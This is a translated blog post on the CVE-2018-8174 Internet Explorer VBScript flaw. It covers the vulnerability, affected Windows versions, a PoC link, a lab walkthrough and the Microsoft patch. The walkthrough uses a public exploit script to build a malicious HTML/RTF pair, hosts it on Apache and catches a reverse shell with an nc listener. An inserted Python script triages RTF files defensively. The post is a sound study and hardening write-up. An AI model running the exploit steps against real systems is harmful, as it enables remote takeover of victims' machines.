CVE-2018-8174: vulnerability exploitation and hardening

Vulnerability description

  A remote code execution vulnerability exists in the way the VBScript engine handles objects in memory. The vulnerability can corrupt memory in such a way that an attacker can execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take control of the affected system. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

  In a web-based attack scenario, an attacker could host a specially crafted website designed to exploit this vulnerability through Internet Explorer and then trick users into viewing it. The attacker could also embed ActiveX controls marked "safe for initialization" in applications or Microsoft Office documents that host the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that exploits the vulnerability.


Affected versions

  • Windows 7
  • Windows Server 2012 R2
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2012
  • Windows 8.1
  • Windows Server 2016
  • Windows Server 2008 R2
  • Windows 10
  • Windows 10 server

Vulnerability detection

PoC repository: https://github.com/clark515/CVE_PoC/

After downloading it, copy the HTML file to your own web server or to the target machine.

When a system vulnerable to CVE-2018-8174 opens the HTML file in IE, a calculator pops up.

Exploit

Attack machine: Kali
Target machine: Windows 7

Download the script to Kali:

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

Enter the directory and run the script to generate the files:

cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.206.128/exploit.html -o exp.rtf -i 192.168.206.128 -p 4444
  • -u: URL of the malicious HTML file
  • -o: name of the generated document
  • -i: listening address
  • -p: listening port

Copy the generated files to the website directory:

cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/

Start the apache2 service:

service apache2 start

Use nc to listen on the port:

nc -lvvp 4444

When the target opens the generated HTML file in IE, the attack machine obtains a shell:

http://192.168.206.128/exploit.html

The nc listener on the attack machine then shows the incoming connection.
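
For defenders, a document like the exp.rtf generated above can be triaged statically before anyone opens it. The following is an added example, not code from the original post or from the exploit repository: it assumes the document carries its URL inside a hex-encoded \objdata group (the way RTF stores embedded and linked OLE objects), and the function names and the sample document are constructed for illustration.

```python
import re
import sys

# RTF control words that mark a linked object refreshed when the file opens.
AUTO_WORDS = (rb"\objautlink", rb"\objupdate")
URL_RE = re.compile(rb"https?://[\x21-\x7e]{4,}")
# The same pattern as UTF-16LE text, the encoding OLE link data commonly uses.
WIDE_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00){4,}")

def objdata_blobs(rtf: bytes):
    """Yield the decoded bytes of each \\objdata payload (hex text in the file)."""
    for m in re.finditer(rb"\\objdata([^{}\\]*)", rtf):
        hexchars = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(1))
        # Drop a dangling nibble so a truncated blob still decodes.
        yield bytes.fromhex(hexchars[: len(hexchars) // 2 * 2].decode("ascii"))

def urls_in(blob: bytes):
    """Return URLs stored as ASCII or as UTF-16LE text in one decoded blob."""
    found = {m.group().decode("ascii") for m in URL_RE.finditer(blob)}
    found |= {m.group().decode("utf-16-le") for m in WIDE_RE.finditer(blob)}
    return found

def triage(rtf: bytes):
    """Return (auto-update control words present, URLs found in object data)."""
    if not rtf.lstrip().startswith(b"{\\rt"):
        raise ValueError("not an RTF document")
    words = [w.decode("ascii") for w in AUTO_WORDS if w in rtf]
    urls = sorted({u for blob in objdata_blobs(rtf) for u in urls_in(blob)})
    return words, urls

def constructed_sample(url="http://192.0.2.10/sample.html"):
    """Constructed, inert sample: an object group whose data is only a URL."""
    hexdata = (b"\x01\x05\x00\x00" + url.encode("utf-16-le") + b"\x00\x00").hex()
    wrapped = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return ("{\\rtf1\\ansi{\\object\\objautlink\\objupdate"
            "{\\*\\objdata " + wrapped + "}}}").encode("ascii")

if __name__ == "__main__":
    # Pass a file path to triage a real document; default is the sample above.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_sample()
    words, urls = triage(data)
    print("auto-update control words:", words or "none")
    print("URLs in object data:", urls or "none")
```

An RTF that combines auto-update control words with a remote URL in its object data deserves analysis in a sandbox. Documents that break up the hex data with extra control words will evade this simple regex, so use a full RTF object parser such as oletools' rtfobj for those.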

Vulnerability fix

Patch download address:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174

Select the update that matches your system version; for example, mine is a 32-bit Windows 7 system.

Run the installer directly after downloading it.

Reference

https://www.freebuf.com/vuls/224379.html


Origin blog.csdn.net/weixin_41924764/article/details/109254685